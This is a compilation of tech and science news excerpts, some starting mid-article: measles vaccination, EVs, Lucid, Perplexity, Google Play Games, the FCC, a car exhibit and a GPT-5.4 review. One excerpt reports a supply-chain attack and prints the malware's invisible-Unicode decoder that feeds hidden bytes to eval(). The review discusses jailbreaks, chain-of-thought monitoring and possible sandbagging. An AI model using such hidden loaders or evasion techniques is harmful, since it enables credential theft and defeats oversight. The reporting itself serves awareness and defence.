Author name: Rejus Almole

Measles vaccinations rose 291% among New Mexico adults during outbreak

In January 2025, a measles outbreak erupted on the western edge of Texas and soon spilled over to New Mexico and other states. The overall outbreak would become the largest the country has seen since 2000, when measles was declared eliminated from the US. In Texas, it was the largest outbreak recorded since 1992. And in New Mexico, it was the first measles outbreak the state had seen since 1996.

But the trajectory of the two states’ measles cases diverged. Texas declared the outbreak within its borders over on August 18, with an end tally of 762 cases. In New Mexico, officials declared its outbreak, which began in February, over on September 26, with a total of just 99 cases.

One of the key differences, according to a new study, was that in New Mexico, the rapid spread of the highly infectious virus spurred a massive surge in measles vaccinations among children and adults. Overall, shots of the measles, mumps, and rubella (MMR) vaccine increased 55 percent statewide from January to September compared to the same period in 2024.

The study, appearing in the Centers for Disease Control and Prevention’s Morbidity and Mortality Weekly Report, further broke down the increase in shots. Over the whole year, the number of MMR doses given to children (defined as younger than 18) increased 18 percent compared to 2024, from 27,988 in 2024 to 32,890 in 2025. Doses in adults (aged 18 and up) skyrocketed by a whopping 291 percent, from 5,748 in 2024 to 22,500 in 2025.
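As a quick check, both percentages can be reproduced from the dose counts quoted above. The sketch below uses a hypothetical helper, `percentIncrease`, which is an illustration and not something taken from the report.

```javascript
// Hypothetical helper (not from the study): percent change between two counts.
function percentIncrease(before, after) {
  return ((after - before) / before) * 100;
}

// Dose counts as quoted in the article.
const children = percentIncrease(27988, 32890);
const adults = percentIncrease(5748, 22500);

console.log(Math.round(children)); // 18
console.log(Math.round(adults));   // 291
```

Rounded to whole numbers, the results match the 18 percent and 291 percent figures.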

The increase in vaccination didn’t appear to be an unrelated fluke. Health officials noted that within two weeks of the outbreak being declared, the number of vaccine doses given in all regions of the state began to exceed the number given during the previous year. And in some regions, when a first measles case was identified, officials saw week-over-week increases in vaccinations as high as 78 and 83 percent.


Supply-chain attack using invisible code hits GitHub and other repositories

The invisible code is rendered with Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading it and following the malicious instructions it conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden.

Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.

const s = v => [...v].map(w => (
  w = w.codePointAt(0),
  w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
  w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);

eval(Buffer.from(s(``)).toString('utf-8'));

“The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”
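For reviewers, one defensive angle is to flag the same two code point ranges the decoder above reads from. The following is a minimal sketch, not Aikido's tooling: `findInvisibleSelectors` is a hypothetical helper name, and the sample string is constructed here purely for illustration.

```javascript
// Hypothetical helper: report code points in the two ranges that the
// decoder shown above maps to byte values (U+FE00..U+FE0F, U+E0100..U+E01EF).
function findInvisibleSelectors(source) {
  const hits = [];
  let offset = 0; // UTF-16 offset into the source string
  for (const ch of source) {
    const cp = ch.codePointAt(0);
    const inFirstRange = cp >= 0xFE00 && cp <= 0xFE0F;
    const inSecondRange = cp >= 0xE0100 && cp <= 0xE01EF;
    if (inFirstRange || inSecondRange) {
      hits.push({ offset, codePoint: "U+" + cp.toString(16).toUpperCase() });
    }
    offset += ch.length; // 1 or 2 UTF-16 units per code point
  }
  return hits;
}

// Illustrative sample: a template literal that looks empty but is not.
const hidden = String.fromCodePoint(0xFE01, 0xE0132);
const sample = "eval(s(`" + hidden + "`));";

const found = findInvisibleSelectors(sample);
console.log(found.length);       // 2
console.log(found[0].codePoint); // U+FE01
```

A single U+FE0F after an emoji is normal text, so a real check would more plausibly alert on long runs of these characters rather than on any one occurrence.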

Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible Unicode characters are encoding malicious payloads.


Doubling the voltage: What 800 V architecture really changes in EVs

According to Leapenergy, however, 800 V prices are coming down. Today, an 800 V platform costs an additional $1,180, but this is projected to fall to $420 by 2028.

Where’s the industry headed?

Industry forecasts suggest that 800 V architectures will initially remain concentrated in higher-end EVs before gradually filtering downmarket.

Some analysts estimate that 15–20 percent of EVs globally could adopt 800 V systems by 2030, although the share is much higher in premium segments, where more than half of vehicles priced above $60,000 may use 800 V platforms.

China’s fast-moving EV industry may push the technology even further, with projections of around 35 percent penetration by the end of the decade.

The shift is being driven largely by improvements in silicon-carbide power electronics, which enable higher voltages while reducing switching losses and improving charging efficiency. As those components scale and costs fall, what is currently a feature of premium EVs from companies like Hyundai Motor Group, Porsche, and Lucid Motors may gradually migrate into more mainstream vehicles.

400 V vs. 800 V verdict:

So here lies the big question: Is 800 V the future of EVs? Yes—but don’t expect it to happen overnight.

Doubling the pack voltage brings clear technical advantages. Lower current means less heat, lighter cabling, more efficient electronics, and the ability to sustain extremely high charging power without pushing connectors and wiring to their limits. That’s why performance-focused EVs like the Taycan have embraced 800 V architectures.
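The "lower current means less heat" point follows from two textbook relations: current is power divided by voltage, and resistive heating scales with the square of the current. The sketch below works one example. The 350 kW charging power and the 0.001 ohm conductor resistance are assumed figures chosen for illustration, not values from the article.

```javascript
// Current drawn at a given power and pack voltage: I = P / V.
function currentAmps(powerWatts, packVolts) {
  return powerWatts / packVolts;
}

// Resistive heating in a conductor: P_loss = I^2 * R.
function resistiveLossWatts(amps, resistanceOhms) {
  return amps * amps * resistanceOhms;
}

const chargePowerWatts = 350000; // assumed 350 kW charging power
const cableOhms = 0.001;         // assumed conductor resistance

const amps400 = currentAmps(chargePowerWatts, 400); // 875 A
const amps800 = currentAmps(chargePowerWatts, 800); // 437.5 A

// Ratio of heat dissipated in the same conductor at 400 V vs. 800 V.
const lossRatio =
  resistiveLossWatts(amps400, cableOhms) / resistiveLossWatts(amps800, cableOhms);

console.log(amps400, amps800);     // 875 437.5
console.log(lossRatio.toFixed(2)); // "4.00"
```

Halving the current cuts heating in an identical conductor to a quarter. In practice, designers may spend some of that margin on thinner, lighter cabling instead.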

For drivers who regularly rely on high-power DC fast-charging, the difference can translate into noticeably shorter stops. And shorter stops mean you can do cooler stuff with your life, instead of waiting for your EV to charge.

However, 400 V systems aren’t going away any time soon. They’re simpler, cheaper, and well understood, and they work perfectly well for the vast majority of EV use cases—especially when most charging still happens at home or at relatively modest public chargers. That’s why hugely successful vehicles like the Tesla Model Y and Ford Mustang Mach-E continue to use optimized 400-volt platforms while still delivering competitive charging speeds.

For now, though, the takeaway is simpler: 800 V isn’t a revolution—it’s an evolution. It makes fast-charging faster and high-performance EVs easier to engineer, but the 400 V architecture that powered the first wave of modern EVs still has plenty of life left in it.


Lucid announces midsize EV platform, says profitability lies with SUVs

Lucid’s entry into the highly competitive, high-volume midsize SUV market will be key to achieving profitability, the company told investors today. And it’s going to do that with a trio of electric SUVs that will use its new midsize EV platform, which it says has been engineered to deliver a starting price below $50,000.

“Today, we’re keeping the same Lucid product and technology DNA intact, while applying increased scale, capital efficiency, and cost discipline, and materially reduced costs, to enable a great business with a clear and credible path to profitability and free cash flow, supported by what we are executing now and what we are building for the future,” said Marc Winterhoff, interim CEO at Lucid.

The company has provided a few details about the first two SUVs due on the new midsize platform. The Lucid Earth is aimed at “trendsetting achievers” and will be the more spacious one. The Lucid Cosmos we expect to be sportier—this one is targeting “upscale nurturers.” The unnamed third SUV will likely be something a bit more off-roady, filling the same niche that Rivian has gone for with its R2.

“With Midsize, we didn’t compromise what makes a Lucid special, we engineered it to scale,” said Derek Jenkins, senior vice president of design and brand at Lucid. “These vehicles deliver unmistakable Lucid design and driving characteristics, while embracing a radically simpler, more efficient approach to manufacturing and cost.”

Part of that is Lucid’s new drive unit, called Atlas, shown in the video above. This unit uses 30 percent fewer parts than Lucid’s current drive unit and weighs 23 percent less. Even better, its bill of materials is 37 percent cheaper. With this drive unit, plus an 800 V battery pack, Lucid’s goal is up to 4.5 miles/kWh (13.8 kWh/100 km) for the most efficient midsize variant. More efficient motors make it possible to use a smaller battery for the same range, and that appears to be the approach here.
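The two efficiency figures are the same quantity in different units, and the conversion is easy to verify. In the sketch below, the function name is hypothetical, and the 300-mile range used to size a pack is an assumed figure for illustration, not something Lucid has announced.

```javascript
const KM_PER_MILE = 1.609344; // international mile, exact by definition

// Convert miles per kWh into kWh per 100 km.
function milesPerKwhToKwhPer100Km(milesPerKwh) {
  const kmPerKwh = milesPerKwh * KM_PER_MILE;
  return 100 / kmPerKwh;
}

const consumption = milesPerKwhToKwhPer100Km(4.5);
console.log(consumption.toFixed(1)); // "13.8"

// Usable pack energy needed for an assumed 300-mile range at that efficiency.
const packKwh = 300 / 4.5;
console.log(packKwh.toFixed(1)); // "66.7"
```

The second figure shows why efficiency matters for cost: the more miles each kWh delivers, the fewer kWh the pack needs for a given range.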


Perplexity’s “Personal Computer” brings its AI agents to the, uh, Personal Computer

Last month Perplexity announced the confusingly named “Computer,” its cloud-based agent tool for completing tasks using a harness that makes use of multiple different AI models. This week, the company is moving that kind of functionality to the desktop with the confusingly named “Personal Computer,” now available in early access by invite only.

Much like the cloud-based version, Personal Computer asks users to describe general objectives rather than specific computing tasks—an introductory video shows Personal Computer’s questions in a sidebar asking things like, “Create an interactive educational guide” and “create a podcast about whales.” But Personal Computer, running on a Mac Mini, also gives Perplexity’s agents local access to your files and apps, which it can open and manipulate directly to attempt to complete those tasks.

That should sound familiar to users of the open source OpenClaw (previously Moltbot), which similarly allows users to let AI agents loose on their personal machines. From the outside, Personal Computer looks like a more buttoned-up, user-friendly version of the same concept, with an easy-to-read, dockable interface that can help users track multiple tasks. Perplexity users can also log in remotely to their local copy of Personal Computer, making it “controllable from any device, anywhere,” Perplexity says.


Google Play Games for PC is getting more premium titles and cross-buy with Android

Buy once (or more) to play anywhere

While Google announced last year it was opening the door to all Android games on Windows, things haven’t exactly worked out like that. It should have been easy, though. None of these “Windows” games is actually built for Windows—Play Games uses virtualization to run a lightweight Android OS in a container for the games. Hypothetically, all Android games should work, but there are still some big gaps.

For example, Play Games for Windows has thus far not supported paid games outside of those on Play Pass, and even some Play Pass content has been absent. In the latter case, that may be because developers have opted out. Google now says developers can choose to have Play Pass content available on both platforms. Regardless, the selection of free-to-play microtransaction factories in Play Games for PC hasn’t exactly screamed “premium experience.”

We should start seeing more paid games for Windows pop up, but Google’s going about it in an odd way. While these are still Android games at their core, Google is treating Windows as a separate platform. Thus, it has announced, “Buy once, play anywhere.” The idea is that developers can offer premium games in Google Play that include both Android and Windows access.

On mobile devices, anything you buy is always available on all other Android phones and tablets, but it’s apparently not the same for Windows. Developers have to join this program to offer cross-buy functionality, and it does not work for games you’ve previously purchased on Android. In addition, premium upgrades purchased on Android don’t necessarily carry over. Google says that depends on developer support and is unrelated to the new cross-buy program.

Google is making strides as it builds its desktop gaming catalog, but it still has a long way to go before it can attract any new players. In the distant past, Google might have just mirrored all mobile games on PC and called it a day, but Play Games on PC isn’t shaping up to be a Wild West. Google today is more deliberative and interested in controlling how apps are distributed. This is just another example of that mentality.

Updated 3/11 at 9PM ET with additional comment from Google. 


FCC chair blasts Amazon after it criticizes SpaceX megaconstellation

In addition to parrying with SpaceX over its proposed, vastly larger orbital data center constellation, Amazon is seeking some regulatory relief of its own. Most pressing for Amazon is a deadline to deploy half of its Amazon Leo constellation, intended to ultimately comprise 3,236 satellites, by July 30. The company will not meet this deadline, with only a little more than three months to go, and Amazon has requested an extension, asking for it to be moved to July 30, 2028.

Carr pulls up

On Wednesday, FCC Chairman Brendan Carr injected himself into the SpaceX-Amazon fracas over megaconstellations.

“Amazon should focus on the fact that it will fall roughly 1,000 satellites short of meeting its upcoming deployment milestone, rather than spending their time and resources filing petitions against companies that are putting thousands of satellites in orbit,” Carr said on X, the social media network owned by Musk.

There are arguments to be made in favor of both SpaceX and Amazon regarding their competing concerns. For example, SpaceX is likely to be able to greatly accelerate the rate at which it launches satellites with the forthcoming Starship rocket. So saying it will take centuries to put its data centers into space is not likely true.

However, it is valid to criticize SpaceX’s application for 1 million satellites, which is an extraordinary number of spacecraft that would completely change many things about low-Earth orbit. The SpaceX application did not contain critical information about the size, mass, and other details needed to evaluate the constellation for safety and other concerns.

It cannot be comfortable for Amazon and Bezos to see Carr weighing in so publicly and favorably on Musk’s side. Legally, Carr is allowed to have strongly held policy views. But he is not supposed to single out companies for preferential treatment.


A glimpse into tuner culture: Fast and Furious exhibit at the Petersen


The museum is celebrating 25 years of the original F&F film with a 23-car exhibit.

The Dodge Charger and Toyota Supra from The Fast and the Furious are among the cars in a new exhibit at the Petersen Museum in Los Angeles. Credit: Ollie Millington/Getty Images

The Fast and Furious franchise has come a long way in the quarter-century since the first film’s release. Originally an undercover cop story, the franchise has morphed into… something else entirely. It’s now a bombastic expression of automotive culture combined with some kind of caper, maybe to save the world. Just don’t think too deeply about the plot.

Along the way, the film’s cars have become nearly as famous as the human stars. If you’re a fan, you probably can’t have Vin Diesel or Michelle Rodriguez come hang out with you in your garage, but you can drive a Charger or Eclipse—or even a Jetta that looks like it escaped from the set. The more well-off collectors don’t need to settle for building a replica, though; they actually own cars that appeared on screen, and there’s quite a community of Fast and Furious car collectors.

You can find some of these cars at the Petersen Automotive Museum, which has a new exhibit celebrating 25 years of the franchise.

“When we started researching this exhibition… you go into the project with the typical ‘I’m going to source a film car’ mindset, where film cars always have interesting histories,” said Kristin Feay, an assistant curator at the Petersen.

“But sometimes it will be owned by collections, it will be private owners, it will be isolated sources,” she said. “With this exhibition, it was interesting because there are actually a number of enthusiastic owners who buy these cars (they collect them, they restore them), and these cars are well known within their communities. They’re known by names like Stunt One or Hero One, Stunt Two, Stunt Three.”

But according to Feay, unlike some other film cars, discovering the history of the Fast and Furious machines takes work.

“When we were trying to source, for example, Brian’s Mitsubishi Eclipse or his Toyota Supra or Dom’s Charger… the research framework for finding these cars was more like a 1960s race car… You’re looking for a vehicle, but you’re looking for a vehicle that has an institutional history and a personal history,” she said.

For the later films, production built cars specifically for use, but in the early days, the producers relied on the tuning scene itself, borrowing cars from tuning shops.

Cars change hands

“That would include Brian’s Toyota Supra, which was built and owned by Craig Lieberman, who worked with Super Street [a tuning magazine] at the time,” Feay said. “The first four cars from the street race (Eclipse, the Integra, the Mazda RX7, and the Honda Civic) were all owned. And the original hero cars were all owned and built by tuners. Letty’s 240 SX actually has a really interesting story about its development as a tuner car. But what this meant is that these cars, because they were customs, have historical significance. They have complex ownership histories.”

You’d have your work cut out trying to eclipse this exhibit with a larger collection of movie cars from the franchise. Credit: Petersen Automotive Museum

In addition to the borrowed cars, copies were made that could be crashed or hacked about to fit cameras. “For each car, depending on the scenes it would be featured in, you could have maybe as few as three facsimiles made, maybe up to 10 facsimiles made. And each of these facsimiles would have, from a collecting standpoint, different degrees of usage and damage. Was this a junk car? Was this an exploded car? Was this a stunt car? Was this a hero car? So within each one of those tiers, you almost have a gradation system like you would for a classic car,” Feay said.

These early cars fell into two camps. Hero cars were returned to their owners—$25 million was too small a budget to buy them outright. But the fame those cars quickly accrued meant their owners started getting mobbed in public.

“These guys couldn’t actually show up to car meets without being totally swamped. So it’s like, ‘Oh, hey, this used to be my car, but it is apparently something else now,’” Feay said.

“That’s what happened to the Integra GSR from the first street race,” she told me. “And essentially from there, you have the typical cycle of auctions and private owners. But the second part of this history of these cars is the replicas.”

What about the replicas?

Hundreds of replicas made by Universal escaped the crusher and were instead stored in a warehouse in Santa Clarita, California, before being repurposed with new paint and bodykits for 2 Fast 2 Furious.

“It’s known as the warehouse scramble scene,” Feay said. “It’s when Brian and Roman are looking to escape from the law at the end of the film. They drive their cars into the warehouse, the garage doors close, and when they open, it’s tons of cars pouring out to distract, to draw attention away from them.”

Suki’s pink Honda S2000 has actually appeared in more than one guise on screen. Credit: Petersen Automotive Museum

“That’s what happened to a few of our cars on display,” she said. “And from there, they were sold to private owners. Some of them went to collections. Some of them sat derelict on people’s lawns… And they essentially went all over the world.”

Don’t expect to find many cars from Tokyo Drift, though. The movie was filmed in 2006, and the Japanese domestic market cars couldn’t be imported to the US. “They were either crushed or sold off to other places outside the United States,” Feay said. “So we were not able to get things like Han’s original Mazda RX7 or the orange and black one, which we really wanted to see here. It was just unfortunate. And then DK’s 350Z also was unable to be located.”

Most of the 23 cars in the exhibit haven’t been seen at the Petersen before, but regular visitors will have seen the pink Honda S2000, which is part of the museum’s permanent collection. “That car is interesting because it was… an actual custom. It was owned and built by the editor of Super Street Magazine, RJ DeVera, who played Danny Yamato in that first street race scene,” Feay told me.

The S2000 is best known as Suki’s bright pink car, but it actually appeared in various guises. “It was black. It had the yellow graphics on it, and that was the original iteration. After that, it went back to RJ, who painted it black, painted it orange, and then rented it back from production as Suki’s car. And then it got a pink paint job, its iconic paintwork,” Feay told me.

Tuning history?

“When you hear the stories behind these cars… you’ll hear about the history, but when you actually look at the object, it makes it real,” Feay said. “And with our cars, you can actually see there are some dings in the paint, like in the interior engine bay, and you can actually see the layers of colors in it. You can see it’s black, you can see it’s orange, you can see when RJ painted it. It’s that object that made me realize that these cars are essentially archeological. These are cars that have this history.”

Letty’s 240 SX also has an interesting history. Owned by a private collector, it was found, painted orange, in someone’s yard.

“It was a notable custom,” Feay told me. “… It is really a true S14 JDM car. It was built by this shop called V-Spec, who also had connections with Super Street. It was significant in that it was what we believe to be one of the first kouki front-end SR20 DET engine-swapped S14s in the US.”

“A Fast and Furious Legacy” opens at the Petersen Automotive Museum in LA on March 14 and runs until April 2027.

Jonathan is the Automotive Editor at Ars Technica. He has a BSc and PhD in Pharmacology. In 2014 he decided to indulge his lifelong passion for the car by leaving the National Human Genome Research Institute and launching Ars Technica’s automotive coverage. He lives in Washington, DC.


GPT-5.4 Is A Substantial Upgrade

Benchmarks have never been less useful for telling us which models are best.

They are good for giving a general sense of the landscape. They definitely paint a picture. But if you’re comparing top models, like GPT-5.4 against Opus 4.6 against Gemini 3.1 Pro, you have to use the models, talk to the models, get reports from those who have and form a gestalt. The reports will contradict each other and you have to work through that. There’s no other way.

Thus, I try to gather and sort a reasonably comprehensive set of reactions, so you can browse the sections that make you most curious.

The gestalt is that GPT-5.4 is a very good model, sir. It’s a substantial upgrade from GPT-5.2, and also from 5.3-Codex, and it puts OpenAI back in the game, whereas I felt like Opus 4.6 dominated OpenAI’s previous offerings for all but narrow uses.

Each lab’s models vary and things change over time, but they tend to have consistent strengths, weaknesses and personalities. From what I’ve seen this is very much an OpenAI model. It’s highly capable, and it is especially seen as a big improvement by the whisperers and those who watch LLMs interact with each other, but it’s not aspiring to be a Claude.

GPT-5.4 Self-Portrait

GPT-5.4 seems like a substantial upgrade over GPT-5.2.

GPT-5.4 seems excellent so far at assembling facts and giving you the rundown, or figuring out what is happening, and other things like that.

I haven’t coded anything since GPT-5.4 came out. It’s clearly good at coding. One key question people are split on is whether it is good at solving for your intent.

Many are reporting that its writing and personality are much improved, and that it can now be used for writing and editing in spots previous models were not useful.

They are claiming strong computer use but no one seems to be testing that either way.

It costs more than GPT-5.2 per token. In some places it gets that back in efficiency, but overall AA reports costs modestly rose from $2304 to $2951. Opus is more expensive ($4970) in max mode, but cheaper ($1451) in normal mode. GPT-5.4-Pro is of course by far the most expensive thing out there, so if you want it then lean on that subscription.

GPT-5.4 is not a step change in core general capabilities. The preparedness framework scores make this clear, and there are various signs that OpenAI’s strategy is focusing on hitting internal metrics and improving the most common use cases. In practice that can be highly useful.

The ‘model relations department,’ those concerned with multi-model interactions and model welfare and consciousness and so on, see this as a big step forward for OpenAI. There’s still a long way to go.

I haven’t noticed much personality from it, and I get more joy from Claude Opus 4.6 than I do from GPT-5.4, but I don’t ask those questions so much.

It’s given me strong pushback, including in places where I think it is wrong. I prefer that to the alternative, if it is not actually convinced.

Benchmarks are solid, but not spectacular, and as I note above they no longer are so relevant.

My recommendation is that you try both GPT-5.4 and Claude Opus 4.6 on all your questions for a bit, and if you’re coding consider giving both of them your problems, and form your own opinion for your particular use case.

For questions that are more than a quick answer or sanity check, I’ve found that dual wielding both Opus 4.6 and GPT-5.4 has been quite useful. I did not feel that way with GPT-5.2, and I don’t typically bother with Gemini 3.1 Pro at this point either.

Sam Altman (CEO OpenAI): GPT-5.4 is launching, available now in the API and Codex and rolling out over the course of the day in ChatGPT.

It’s much better at knowledge work and web search, and it has native computer use capabilities.

You can steer it mid-response, and it supports 1m tokens of context.

GPT-5.4 is great at coding, knowledge work, computer use, etc, and it’s nice to see how much people are enjoying it.

But it’s also my favorite model to talk to! We have missed the mark on model personality for awhile, so it feels extra good to be moving in the right direction.

OpenAI: Today, we’re releasing GPT‑5.4 in ChatGPT (as GPT‑5.4 Thinking), the API, and Codex. It’s our most capable and efficient frontier model for professional work. We’re also releasing GPT‑5.4 Pro in ChatGPT and the API, for people who want maximum performance on complex tasks.

GPT‑5.4 brings together the best of our recent advances in reasoning, coding, and agentic workflows into a single frontier model. It incorporates the industry-leading coding capabilities of GPT‑5.3‑Codex⁠ while improving how the model works across tools, software environments, and professional tasks involving spreadsheets, presentations, and documents. The result is a model that gets complex real work done accurately, effectively, and efficiently—delivering what you asked for with less back and forth.

SWE-Bench is slightly above 5.3-Codex at all thinking levels, but only slightly.

The graying out is kind of radical here, but I suppose it’s progress.

Tejal Patwardhan (OpenAI): GPT-5.4 is state-of-the-art on GDPval, and here are some examples of how the model is much better at well-specified knowledge work tasks

6mos ago the models could barely make a spreadsheet or slide! progress is happening really fast

roon (OpenAI): 5.4 is my personal 4o honestly it just gets me

Things they are highlighting:

  1. You can now adjust course mid-response.

  2. Improved deep web research.

  3. Better at maintaining context for longer thinking.

  4. Native SoTA computer use capabilities.

  5. 1M token context window.

  6. Improved tool search, now directly in the API.

  7. Improved token efficiency.

  8. Also released same day: ChatGPT for Excel add-in, along with updated spreadsheet and presentation skills in Codex and their API.

  9. /fast in Codex gives you 50% faster tokens.

Pricing is a little higher than 5.2, which is unusual. Hopefully token efficiency more than makes up for it?

FrontierMath scores are up, especially on Tier 4. Trying pass@10 for 5.4-xhigh got it to 38%, including solving a problem no model has solved before.

Epoch AI: GPT-5.4 set a new record on FrontierMath, our benchmark of extremely challenging math problems! We had pre-release access to evaluate the model. On Tiers 1–3, GPT-5.4 Pro scored 50%. On Tier 4 it scored 38%.

Leeham: GPT-5.4 Pro solves the first of the FrontierMath Open Problems!

Two days ago, I sent @AcerFur a potential solution to this problem and was sent to @GregHBurnham for verification (prior to any other solution).

We are confident it’s correct and waiting to hear from the author!

Exciting stuff, I will report back when I know the outcome.

Progress continues on ZeroBench.

Jonathan Roberts: GPT-5.4 xhigh sets a new pass@5 and pass^5 SOTA on ZeroBench

pass@5: 23% (prev. 19%)

pass^5: 8% (prev. 7%)
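For anyone fuzzy on the difference between those two numbers, here is a minimal sketch. It assumes the usual reading, where pass@5 counts a question as solved if any of five attempts is correct and pass^5 counts it only if all five are. The function names and the toy data are mine, not ZeroBench's.

```python
from typing import List

def pass_at_k(trials: List[List[bool]]) -> float:
    """Fraction of questions solved in at least one of the k attempts."""
    return sum(any(t) for t in trials) / len(trials)

def pass_hat_k(trials: List[List[bool]]) -> float:
    """Fraction of questions solved in every one of the k attempts."""
    return sum(all(t) for t in trials) / len(trials)

# Hypothetical results: 4 questions, 5 attempts each (not real ZeroBench data).
toy_trials = [
    [True, True, True, True, True],       # solved reliably
    [False, True, False, False, False],   # solved once, by luck or otherwise
    [False, False, False, False, False],  # never solved
    [False, False, False, False, False],  # never solved
]

print(pass_at_k(toy_trials))   # 0.5
print(pass_hat_k(toy_trials))  # 0.25
```

The gap between the two is a rough measure of how much of the headline score depends on getting multiple tries.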

Artificial Analysis has GPT-5.4 in a virtual tie with Gemini 3.1 Pro.

Their version of GDPval, called GDPval-AA, has 5.4 about 1% ahead of Opus 4.6.

AA-Omniscience (which is correct minus incorrect) remains dominated by Gemini 3.1 Preview at +33, versus Opus at +14 and GPT-5.4 at +10.
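A 'correct minus incorrect' score rewards declining to answer over guessing wrong. Here is a rough sketch of that arithmetic, assuming the score is expressed in percentage points over all questions and that abstentions count as zero. The function name and the numbers are hypothetical, not Artificial Analysis data.

```python
def net_score(correct: int, incorrect: int, abstained: int) -> float:
    """Correct minus incorrect, as percentage points of all questions asked."""
    total = correct + incorrect + abstained
    if total == 0:
        raise ValueError("need at least one question")
    return 100.0 * (correct - incorrect) / total

# Hypothetical model A: answers almost everything, gets more right in absolute terms.
print(net_score(correct=60, incorrect=35, abstained=5))   # 25.0

# Hypothetical model B: gets fewer right, but abstains instead of guessing wrong.
print(net_score(correct=50, incorrect=20, abstained=30))  # 30.0
```

Under these assumptions the model that knows less but also hallucinates less comes out ahead, which is the point of scoring this way.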

Score on Artificial Analysis Physics was exceptionally strong.

AA reports speed of 74 tokens per second, which is quite good for this quality level, versus Opus at 47 and Gemini 3.1 Pro at 114 (but I said this quality level).

Gemini 3 Pro beats out Claude Opus 4.6 in the final of Season 1 of MageBench, on Magic: The Gathering, with GPT-5.4 (medium) losing a tight semi to Gemini. Current Elo ratings have Opus on top, then GPT-5.2 (?) with Gemini in third and GPT-5.4 7th.

Håvard Ihle: GPT 5.4 (no thinking) scores 57.4% on WeirdML, well ahead of GPT 5.2 (no thinking) at 49.6%.

It’s on the frontier for accuracy/token. Results with thinking coming next week.

It sets a new record of 94.6% on a Haskell Benchmark versus 92% for Gemini 3.1 and 90.2% for Claude Opus 4.6.

Trysansa has it in second behind Gemini 3.1 Pro.

Mercor has it #1 overall, a bit above previous best model GPT-5.2.

Vals.ai still has it below Sonnet 4.6 and Gemini 3.1 Pro.

Speechmap.ai, which tests refusals, finds it quite refusal-heavy.

These incremental upgrades often have mostly duplicative system cards.

Training methods explanation is unchanged.

In terms of the preparedness framework, this moves into High capability of Cybersecurity, similar to GPT-5.3 Codex.

I don’t think OpenAI is taking a bunch of these areas seriously. They’re likely training to hit these internal benchmarks, or simply observing the models doing well on them, and thinking that’s all they need to do, or that they should get even more 9s of victory on this test.

Their evals for disallowed content are essentially saturated and bouncing around, for various values of ‘disallowed [or undesired] content.’ The ‘dynamic benchmarks with adversarial user simulations’ was saturated by 5.2 and is modestly more saturated now.

Here’s the disallowed content evaluation with representative prompts, and I mean come on what are we even doing here, okay, four nines, we get it.

The goal is ‘this isn’t a lot worse than before,’ and okay, sure, agreed, as far as it goes.

Jailbreak defense, such as it is, seems similar to 5.2.

The problem is that jailbreak defense measures against last month’s attacks, not next month’s attacks. It looks like jailbreaks will remain in the ‘annoying but if you care they still work’ range.

Wyatt Walls: “representative prompts”: i.e. prompts designed to get around restrictions of *previous models*

o1 was at 99% on production jailbreaks. But people quickly found ways around it

Here is the first ‘real’ evaluation set, for health questions, where the big difference is that GPT-5.4 had longer responses:

Avoiding destructive actions is a big deal, so as I noted with Codex-5.3 it is good to see this test, although that number is still not that close to 1:

Table 8 is not like the others. This is Actual Progress, at least on the test set, from never to sometimes:

Destructive action can also be particularly prevalent when agents operate deletion-inducing tasks (e.g., file reversion and cleanup) in complex workspaces with ongoing changes from users or even other agents. A safe and collaborative agent should distinguish between their work and user work, protect user changes by default, and recover from mistakes. Therefore, we trained our agents to revert their own changes after long rollouts while protecting implicit, simulated user work

On evaluations involving challenging, long-rollout traces, GPT-5.4-Thinking performs much better than earlier models in tracking and reverting its operations while leaving user work intact.

This is not that useful yet, since a 50% non-preservation rate means you still probably can’t use it for this purpose, but it bodes well down the line.

GPT-5.4 chain of thought monitorability looks slightly down versus GPT-5. It’s good that they are checking it. There are some places where it used to be ~100% and now it is less, so I worry this is the start of a negative S-curve. I also worry that these tests are not being curious about whether the CoT can actually be relied upon. If you were facing a model that wanted to disguise or fake its CoT in key situations then I would expect these tests not to notice.

What about controlling the CoT? Not a great idea even when done well, and when done poorly it’s one of the worst ideas, and by their tests it looks like it doesn’t work well anyway.

GPT-5.4 does not newly cross any OpenAI thresholds.

I went over these same tests for GPT-5.2 and GPT-5.3-Codex, so I won’t go over the details again. Improvements are tiny and in some places we see regressions from GPT-5.3-Codex.

The noticeable bumps are a small one in Monorepo-Bench, up ~2.5%, and a big move in MLE-Bench, the ability to solve Kaggle challenges on GPUs, where we moved from 12.2% to 23%, but that test was not reported for GPT-5.3-Codex, so one assumes most or all of that jump was already present.

Overall, the Preparedness Framework presents GPT-5.4 as, if anything, a small regression from GPT-5.3-Codex.

If GPT-5.4 is a big jump in useful capabilities from GPT-5.3-Codex, despite not scoring as more dangerous on the Preparedness Framework tests, then why?

I can think of a few possibilities.

  1. GPT-5.4 is heavily optimized for hitting particular metrics and doing well on the most common tasks. This doesn’t translate much to non-central difficult tasks, like those in the Preparedness Framework. Would be bearish for GPT-5.4.

  2. GPT-5.4 is sandbagging these evaluations, either knowing they are evaluations or thinking the tasks are harmful. If so and OpenAI isn’t noticing, that’s terrifying.

  3. GPT-5.4 is basically GPT-5.3-Codex turned into a general chat model, so all of the core capability advances were already priced in, but it still gets a lot more useful, especially if you are chatting. Plausible.

